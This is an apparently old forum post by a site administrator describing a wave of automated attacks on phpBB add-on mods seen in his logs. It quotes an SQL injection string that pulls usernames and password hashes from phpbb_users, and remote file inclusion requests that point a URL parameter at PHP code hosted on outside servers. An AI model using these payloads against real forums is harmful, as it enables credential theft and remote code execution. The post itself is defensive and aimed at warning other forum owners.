New phpBB Virus?

[Dan]

I have been tracking an incrase in phpBB expoite attments on compsci.ca (they obvesly fail since there is no much left of phpbb below the look of the site). At first i thought it was just an increase of script kiddys using tools to randomly try to hack phpBB based sites but the more i look in to it the more it looks like a new phpBB virus is out there. Almost all the atacks come from compently diffrent ips from all over the world yet they all share alot of common elements. Mainly they all target phpbb mods or add ons rather the the core phpbb code. So far i have seen them consitrait on the hyericky mod, the links page mod and the image gallery mod. There are two main types of attacks witch i will descibe bellow:

SQL Injection:

The attacker sends a string like %2%200UNION%20SELECT%201,username,user_password,4,5,6,7%20,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_%20id=2/* to the start uri var in links.php. (btw don't go to this page on compsci.ca or it may auto ban you)



Messed up File Injection?:

This one i do not understand at all and is now even more comman then the sql injection one, is where instend of sending a sql line to a uri variable they send an url to a txt file. This txt file contains some php code witch is noramly about the same give or take a few lines but oddly it is hosted on 100s of diffrent servers around the world and they all seem to be servers for real creditable sites witch is why i think this is a new virus. Also they do not seem to constraite on one invidual php page or var like the sql injection and seem to randomly try all diffrent kinds.

Such a request looks somthing like: index.php?h=http%3A%2F%2Fwww.qubestunes.com%2Fte%2Fratov%2Fomuley%2F&pf=14 (btw don't go to this page on compsci.ca or it may auto ban you)
or: index.php?h=http://usuarios.arnet.com.ar/larry123/safe.txt (this one seems to have been removed from the infected server, still don't go to this link on compsci.ca or auto ban)

I realy don't get how this atactk is sposted to work unless peoleop make a habit of including and runing code they got from strings they got from the uri variable.


Also what makes this more distrubinbg is it seems the atactks change slighty every few days as if they are almost geting better, like this is a trogin virus of some kind and some one is chaing the atacks every so offten.


As i side above compsci.ca is not effected by thess hacks, tho they do incrases trafic. My consern is mostly for the poor phpbb users out there that have no changed much of there code. Even if newer versions of phpbb are not effects by this, the traffic generated from thess atacks could hurt fourms on shared servers. I guse the best idea for peoleop starting up fourms might be to simply avoid phpbb or at the very least avoid phpbb mods that are of poor qaulity (most of them). If any one has any more info on this virus/atacks let me know, epstaly how puting a string to a txt file is sposted to work.


Once again do not try to do the aboive sql or file what ever injection on compsci.ca, it will not work and it will bring up a message about you trying to hack the site and put your ip on a list to be band.


Edit: This is deftaly not Santy.A witch was a phpbb virus that speared using google a few years ago.